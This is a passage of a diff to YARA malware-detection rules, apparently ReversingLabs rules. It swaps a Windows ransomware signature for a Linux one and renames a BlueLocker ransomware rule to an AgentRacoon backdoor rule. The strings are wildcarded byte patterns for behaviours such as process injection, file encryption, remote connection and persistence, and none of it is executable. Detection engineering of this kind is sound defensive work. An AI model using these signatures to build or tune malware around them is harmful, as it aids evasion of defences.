?? ?? 74 ?? FF B5 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? - 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ?? - ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 38 9D ?? ?? ?? ?? - 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 8B D8 56 FF 15 ?? ?? ?? - ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B C3 8B 4D ?? - 5F 33 CD 5B E8 ?? ?? ?? ?? C9 C3 + $network_communication_1 = { + 48 89 5C 24 ?? 48 89 6C 24 ?? 48 89 F3 4C 89 64 24 ?? 4C 89 6C 24 ?? 48 81 EC ?? ?? + ?? ?? 48 8B 06 48 89 FD 89 54 24 ?? 45 89 C4 48 83 78 ?? ?? 0F 84 ?? ?? ?? ?? 4C 8D + 6C 24 ?? 48 8B 33 4C 89 EF E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 83 78 ?? ?? 0F 84 ?? ?? + ?? ?? 45 84 E4 0F 85 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 88 45 + ?? 80 7D ?? ?? 0F 84 ?? ?? ?? ?? C6 45 ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? + ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 89 C5 0F 84 ?? ?? ?? ?? 48 8D 4C 24 ?? 41 B8 ?? ?? ?? + ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 89 C7 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? + ?? ?? ?? 48 8D 5C 24 ?? E8 ?? ?? ?? ?? 48 8D 4C 24 ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? + 41 B8 ?? ?? ?? ?? 89 EF 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? + ?? ?? ?? 48 8B 7C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 48 C7 44 24 ?? ?? ?? + ?? ?? 66 C1 C8 ?? 66 C7 44 24 ?? ?? ?? 66 89 44 24 ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? + 89 44 24 ?? 48 89 DE 89 EF E8 ?? ?? ?? ?? 83 C0 ?? 0F 84 ?? ?? ?? ?? 0F 1F 44 00 ?? + 48 8B 5C 24 ?? 48 83 EB ?? 48 81 FB ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 89 E8 48 8B 5C 24 + ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 } - $inject_code_into_process = { - 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 - ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F8 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? - 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ?? 8B C6 8D 8D - ?? ?? ?? ?? 66 8B 11 66 3B 10 75 ?? 66 85 D2 74 ?? 66 8B 51 ?? 66 3B 50 ?? 75 ?? 83 - C1 ?? 83 C0 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 75 ?? FF B5 ?? ?? ?? - ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? FF 15 ?? ?? ?? ?? 39 85 ?? ?? ?? ?? - 74 ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? C6 45 ?? - ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 - ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? - ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 - ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 8D ?? - ?? ?? ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 3B 8D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 8B - 4D ?? 85 C9 74 ?? 51 8B D0 E8 ?? ?? ?? ?? 8B 4D ?? B8 ?? ?? ?? ?? 8B 75 ?? 83 C4 ?? - 2B CE F7 E9 C1 FA ?? 8B C2 C1 E8 ?? 03 C2 8D 0C 40 8B C6 C1 E1 ?? 81 F9 ?? ?? ?? ?? - 72 ?? 8B 76 ?? 83 C1 ?? 2B C6 83 C0 ?? 83 F8 ?? 77 ?? 51 56 E8 ?? ?? ?? ?? 83 C4 ?? - 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D 8B E3 - 5B C3 E8 + $network_communication_2 = { + 48 89 5C 24 ?? 48 89 6C 24 ?? 48 89 FB 4C 89 64 24 ?? BE ?? ?? ?? ?? 48 83 EC ?? BF + ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? + ?? ?? ?? 48 8D 73 ?? 48 8D 53 ?? BF ?? ?? ?? ?? 48 8D 6C 24 ?? 45 31 E4 E8 ?? ?? ?? + ?? 48 89 DF E8 ?? ?? ?? ?? 48 8B 73 ?? 48 89 EF E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 83 + 78 ?? ?? 74 ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? + 4C 8D 64 24 ?? 48 89 EE 4C 89 E7 E8 ?? ?? ?? ?? 4C 89 E6 48 89 DF E8 ?? ?? ?? ?? 48 + 8B 6C 24 ?? 41 89 C4 48 83 ED ?? 48 81 FD ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 45 84 E4 74 + ?? 80 7B ?? ?? 0F 84 ?? ?? ?? ?? 90 48 89 DF E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 41 0F B6 + EC 48 83 EB ?? 48 81 FB ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 89 E8 48 8B 5C 24 ?? 48 8B 6C + 24 ?? 4C 8B 64 24 ?? 48 83 C4 ?? C3 } - $remote_connection_p1 = { - 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? C7 45 - ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 28 45 - ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? - ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? - C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 29 45 ?? 0F 28 45 - ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? - ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF 85 ?? ?? ?? ?? 50 0F 29 45 ?? E8 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 - ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? - 0F 28 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? - ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF 85 ?? ?? ?? ?? 0F 29 45 ?? - C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? - 0F 28 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? - ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF 85 ?? ?? ?? ?? C7 45 ?? ?? - ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 29 45 + $persistence_mechanism_redhat_v11 = { + 41 57 41 56 41 55 41 54 55 53 48 83 EC ?? 48 8D 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 6C 24 + ?? 8B 7D ?? 4C 8D 7D ?? 81 C7 ?? ?? ?? ?? 48 63 FF E8 ?? ?? ?? ?? 48 89 C3 48 8D 7C + 24 ?? 48 89 EE E8 ?? ?? ?? ?? 4C 8B 6C 24 ?? BE ?? ?? ?? ?? 48 89 DF 31 C0 4C 8D 74 + 24 ?? 4C 89 EA E8 ?? ?? ?? ?? 48 98 48 8D 54 24 ?? 48 89 DE C6 04 18 ?? 4C 89 F7 E8 + ?? ?? ?? ?? 48 8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0 74 ?? 4C 89 E9 4C 89 EA BE ?? + ?? ?? ?? 48 89 DF 49 89 E9 4D 89 E8 31 C0 E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 41 89 C4 B9 + ?? ?? ?? ?? 89 C2 48 89 DE E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0 + 0F 85 ?? ?? ?? ?? 48 8B 54 24 ?? 48 89 DF BE ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 89 + DF E8 ?? ?? ?? ?? 4C 89 EA BE ?? ?? ?? ?? 48 89 DF 31 C0 48 8D 6C 24 ?? E8 ?? ?? ?? + ?? 48 98 48 8D 54 24 ?? 48 89 DE C6 04 18 ?? 48 89 EF E8 ?? ?? ?? ?? 48 89 E7 31 C9 + BA ?? ?? ?? ?? 48 89 EE E8 ?? ?? ?? ?? 48 8B 6C 24 ?? 41 BE ?? ?? ?? ?? 4C 8B 24 24 + 48 83 ED ?? 4C 39 F5 0F 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 85 + C0 0F 84 ?? ?? ?? ?? 48 89 DF 49 8D 5C 24 ?? E8 ?? ?? ?? ?? 49 39 DE 0F 85 ?? ?? ?? + ?? 48 8B 5C 24 ?? 48 83 EB ?? 49 39 DE 0F 85 ?? ?? ?? ?? 49 8D 5D ?? 49 39 DE 0F 85 + ?? ?? ?? ?? 49 81 FF ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 83 C4 ?? 5B 5D 41 5C 41 5D 41 + 5E 41 5F C3 } - $remote_connection_p2 = { - 0F 28 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? - ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF 85 ?? ?? ?? ?? 50 0F 29 45 - ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 0F 43 95 - ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? - ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 33 C0 39 41 - ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? B8 ?? - ?? ?? ?? 2B C1 83 F8 ?? 0F 82 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 51 - 0F 43 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 - FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? - 0F 43 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? - ?? 83 C4 ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 83 BD ?? ?? ?? ?? - ?? 8B 85 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 03 C1 50 51 8D 85 ?? ?? ?? ?? 50 8D 4D ?? - E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 - 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 C4 ?? 8B F0 83 FA ?? 72 ?? 8B - 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? - 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 + $change_timestamp_and_read_config_v11 = { + 55 53 48 83 EC ?? 48 8D 5C 24 ?? 48 89 E7 E8 ?? ?? ?? ?? 48 89 E6 48 89 DF E8 ?? ?? + ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 48 81 FB ?? ?? ?? ?? 0F 85 + ?? ?? ?? ?? 48 89 E6 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 1C 24 BE ?? ?? ?? ?? 48 89 + DF E8 ?? ?? ?? ?? 48 85 C0 74 ?? 48 83 C0 ?? 89 C5 29 DD 8D 7D ?? 48 63 FF E8 ?? ?? + ?? ?? 48 63 D5 48 89 C3 48 89 C7 C6 04 02 ?? 48 8B 34 24 E8 ?? ?? ?? ?? 48 89 DF E8 + ?? ?? ?? ?? 48 89 DE 48 89 C2 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? + BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 1C 24 B8 ?? ?? ?? + ?? 48 83 EB ?? 48 39 D8 75 ?? 48 83 C4 ?? 5B 5D C3 } - $encrypt_files = { - 8B FF 55 8B EC 83 EC ?? 8B 4D ?? 89 4D ?? 53 56 8B 75 ?? 57 8B 7D ?? 89 7D ?? 85 C9 - 0F 84 ?? ?? ?? ?? 85 FF 75 ?? E8 ?? ?? ?? ?? 83 20 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 83 C8 ?? E9 ?? ?? ?? ?? 8B C6 8B D6 C1 FA ?? 83 E0 ?? 6B C0 ?? 89 - 55 ?? 8B 14 95 ?? ?? ?? ?? 89 45 ?? 8A 5C 02 ?? 80 FB ?? 74 ?? 80 FB ?? 75 ?? 8B C1 - F7 D0 A8 ?? 74 ?? 8B 45 ?? F6 44 02 ?? ?? 74 ?? 6A ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? - 83 C4 ?? 56 E8 ?? ?? ?? ?? 59 84 C0 74 ?? 84 DB 74 ?? FE CB 80 FB ?? 0F 87 ?? ?? ?? - ?? FF 75 ?? 8D 45 ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 E9 ?? ?? ?? ?? FF 75 ?? 8D - 45 ?? 57 56 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B 45 ?? 8B 0C 85 ?? ?? ?? ?? 8B 45 ?? - 80 7C 01 ?? ?? 7D ?? 0F BE C3 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 83 E8 ?? 0F 85 ?? ?? ?? - ?? FF 75 ?? 8D 45 ?? 57 56 50 E8 ?? ?? ?? ?? EB ?? FF 75 ?? 8D 45 ?? 57 56 50 E8 ?? - ?? ?? ?? EB ?? FF 75 ?? 8D 45 ?? 57 56 50 E8 ?? ?? ?? ?? EB ?? 8B 4C 01 ?? 8D 7D ?? - 33 C0 AB 6A ?? AB AB 8D 45 ?? 50 FF 75 ?? FF 75 ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? - FF 15 ?? ?? ?? ?? 89 45 ?? 8D 75 ?? 8D 7D ?? A5 A5 A5 8B 45 ?? 85 C0 75 ?? 8B 45 ?? - 85 C0 74 ?? 6A ?? 5E 3B C6 75 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 - 30 E9 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 E9 ?? ?? ?? ?? 8B 7D ?? 8B 45 ?? 8B 4D ?? 8B - 04 85 ?? ?? ?? ?? F6 44 08 ?? ?? 74 ?? 80 3F ?? 74 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 83 20 ?? E9 ?? ?? ?? ?? 2B 45 ?? EB ?? 33 C0 5F 5E 5B C9 C3 + $generate_machine_id_v11 = { + 41 57 BE ?? ?? ?? ?? 49 89 FF 41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 8D 9C + 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 8D AC 24 ?? ?? ?? + ?? 31 C9 BA ?? ?? ?? ?? 48 89 DE 4C 89 EF E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 41 + BE ?? ?? ?? ?? 48 83 EB ?? 4C 39 F3 0F 85 ?? ?? ?? ?? 4C 8D A4 24 ?? ?? ?? ?? 48 8B + B4 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 8B 84 24 + ?? ?? ?? ?? 48 83 78 ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 48 8D 94 24 ?? + ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 31 C9 BA ?? + ?? ?? ?? 48 89 DE 48 89 EF E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 + DE 0F 85 ?? ?? ?? ?? 48 89 EE 4C 89 E7 E8 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48 8D + BC 24 ?? ?? ?? ?? 48 8B 56 ?? E8 ?? ?? ?? ?? 31 FF 4C 8B AC 24 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 89 C7 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 C6 48 8D BC 24 ?? ?? ?? + ?? F7 EA 89 F1 89 F5 C1 F9 ?? C1 FA ?? 29 CA 69 D2 ?? ?? ?? ?? 29 D5 E8 ?? ?? ?? ?? + 48 8B 9C 24 ?? ?? ?? ?? 41 89 E8 31 C0 4C 89 E9 BE ?? ?? ?? ?? 48 89 E7 48 89 DA 48 + 83 EB ?? E8 ?? ?? ?? ?? 49 39 DE 89 C5 0F 85 ?? ?? ?? ?? 48 63 C5 48 8D 94 24 ?? ?? + ?? ?? 48 8D BC 24 ?? ?? ?? ?? C6 04 04 ?? 48 89 E6 E8 ?? ?? ?? ?? 48 8D 94 24 ?? ?? + ?? ?? 48 89 E6 4C 89 FF E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DE + 0F 85 ?? ?? ?? ?? 49 8D 5D ?? 49 39 DE 0F 85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 + 83 EB ?? 49 39 DE 0F 85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DE 0F + 85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DE 0F 85 ?? ?? ?? ?? 48 81 + C4 ?? ?? ?? ?? 4C 89 F8 5B 5D 41 5C 41 5D 41 5E 41 5F C3 + } + $persistence_mechanism_redhat_v7 = { + 48 89 6C 24 ?? 4C 89 7C 24 ?? 48 89 5C 24 ?? 4C 89 64 24 ?? 4C 89 6C 24 ?? 4C 89 74 + 24 ?? 48 81 EC ?? ?? ?? ?? 48 8D 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 6C 24 ?? 8B 7D ?? 4C + 8D 7D ?? 81 C7 ?? ?? ?? ?? 48 63 FF E8 ?? ?? ?? ?? 48 89 C3 48 8D 7C 24 ?? 48 89 EE + E8 ?? ?? ?? ?? 4C 8B 64 24 ?? BE ?? ?? ?? ?? 48 89 DF 31 C0 4C 8D 74 24 ?? 4C 89 E2 + E8 ?? ?? ?? ?? 48 98 48 8D 54 24 ?? 48 89 DE C6 04 18 ?? 4C 89 F7 E8 ?? ?? ?? ?? 48 + 8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0 74 ?? 4C 89 E1 4C 89 E2 BE ?? ?? ?? ?? 48 89 + DF 49 89 E9 4D 89 E0 31 C0 E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 41 89 C5 B9 ?? ?? ?? ?? 89 + C2 48 89 DE E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? + ?? 48 8B 54 24 ?? 48 89 DF BE ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? + ?? 4C 89 E2 BE ?? ?? ?? ?? 48 89 DF 31 C0 E8 ?? ?? ?? ?? 48 98 48 89 E7 31 C9 C6 04 + 18 ?? BA ?? ?? ?? ?? 48 89 DE E8 ?? ?? ?? ?? 48 8B 2C 24 BE ?? ?? ?? ?? 48 89 EF E8 + ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 DF 48 8D 5D ?? BD ?? ?? ?? ?? E8 ?? ?? + ?? ?? 48 39 EB 0F 85 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 48 39 DD 0F 85 ?? ?? ?? + ?? 49 8D 5C 24 ?? 48 39 DD 0F 85 ?? ?? ?? ?? 49 81 FF ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? + 48 8B 5C 24 ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B AC 24 ?? ?? ?? ?? 4C 8B B4 24 ?? + ?? ?? ?? 4C 8B BC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 + } + $get_device_name_v7 = { + 48 89 5C 24 ?? 48 89 6C 24 ?? BE ?? ?? ?? ?? 4C 89 64 24 ?? 4C 89 6C 24 ?? B9 ?? ?? + ?? ?? 4C 89 74 24 ?? 48 81 EC ?? ?? ?? ?? 4C 8B 05 ?? ?? ?? ?? 48 8D 5C 24 ?? BA ?? + ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 DE BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 5C 24 + ?? 41 BD ?? ?? ?? ?? 48 83 EB ?? 4C 39 EB 0F 85 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 + 83 78 ?? ?? 75 ?? 48 8D 5C 24 ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 DE BF ?? ?? ?? ?? E8 + ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? + ?? 48 8B 15 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 7C 24 ?? + E8 ?? ?? ?? ?? 4C 8B 64 24 ?? 48 89 E7 E8 ?? ?? ?? ?? 48 8B 2C 24 48 8D 5C 24 ?? 41 + B8 ?? ?? ?? ?? 4C 89 E2 BE ?? ?? ?? ?? 31 C0 48 89 DF 48 89 E9 E8 ?? ?? ?? ?? 48 89 + DE BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 48 8D 5D ?? 49 39 DD 0F 85 ?? ?? ?? ?? 49 8D 5C 24 ?? 49 39 DD 0F + 85 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B 6C 24 ?? 4C 8B B4 + 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 + } + $generate_machine_id_v7 = { + 41 57 31 C9 BA ?? ?? ?? ?? BE ?? ?? ?? ?? 49 89 FF 41 56 41 55 41 54 55 53 48 81 EC + ?? ?? ?? ?? 4C 8D A4 24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? + 48 8B B4 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48 8B + 84 24 ?? ?? ?? ?? 48 83 78 ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 31 C9 BA + ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 DE 48 89 EF E8 ?? ?? ?? ?? + 48 8B B4 24 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? 48 8B 56 ?? E8 ?? ?? ?? ?? 31 FF 4C + 8B B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? + ?? 89 C6 48 8D BC 24 ?? ?? ?? ?? F7 EA 89 F1 89 F5 C1 F9 ?? C1 FA ?? 29 CA 69 D2 ?? + ?? ?? ?? 29 D5 E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 41 89 E8 31 C0 4C 89 F1 BE ?? + ?? ?? ?? 48 89 E7 41 BD ?? ?? ?? ?? 48 89 DA 48 83 EB ?? E8 ?? ?? ?? ?? 4C 39 EB 89 + C5 0F 85 ?? ?? ?? ?? 48 63 C5 48 8D 94 24 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? C6 04 + 04 ?? 48 89 E6 E8 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 E6 4C 89 FF E8 ?? ?? ?? + ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ?? ?? 49 8D 5E ?? 49 39 + DD 0F 85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ?? ?? + 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? + ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 4C 89 F8 5B 5D 41 5C + 41 5D 41 5E 41 5F C3 } condition: - uint16(0)==0x5A4D and ($inject_code_into_process) and ( all of ($find_files_p*)) and ($encrypt_files) and ( all of ($remote_connection_p*)) + uint32(0)==0x464C457F and (($persistence_mechanism_ubuntu) and ( all of ($network_communication_*)) and ((($change_timestamp_and_read_config_v11) and ($persistence_mechanism_redhat_v11) and ($generate_machine_id_v11)) or (($persistence_mechanism_redhat_v7) and ($get_device_name_v7) and ($generate_machine_id_v7)))) } -rule REVERSINGLABS_Win32_Ransomware_Bluelocker : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Agentracoon : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects BlueLocker ransomware." + description = "Yara rule that detects AgentRacoon backdoor." author = "ReversingLabs" - id = 